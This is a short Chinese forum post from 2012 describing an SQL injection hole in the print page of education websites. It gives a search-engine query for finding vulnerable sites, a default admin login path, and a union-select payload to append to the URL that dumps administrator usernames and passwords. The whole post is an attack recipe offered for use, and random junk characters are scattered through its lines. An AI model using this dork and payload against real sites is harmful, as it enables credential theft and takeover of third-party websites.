教育站打印页面漏洞' @- i3 d4 G2 C Z
百度或google搜索 inurl:info_Print.asp?ArticleID=
Y% D! e) j( G) ^默认后台:/ad_login.asp3 c S/ n' c4 d) u* r+ l
爆管理员密码:
$ W; c, D, R8 o% M在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可( X1 o, u: b* T
( D4 h8 [- m1 q; o$ i5 U
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
; B" S+ q6 y# P* X4 L" Q6 g. U6 C0 `% r9 x
作者:佚名 t C5 L+ v: A* {" K5 P9 j! J0 Q# }
' z+ E! w* P7 x' o+ p$ S( ^" ^$ O % n7 h8 f3 g" W- C2 N
|
发表于 2012-10-31 08:37:31
收藏
支持
反对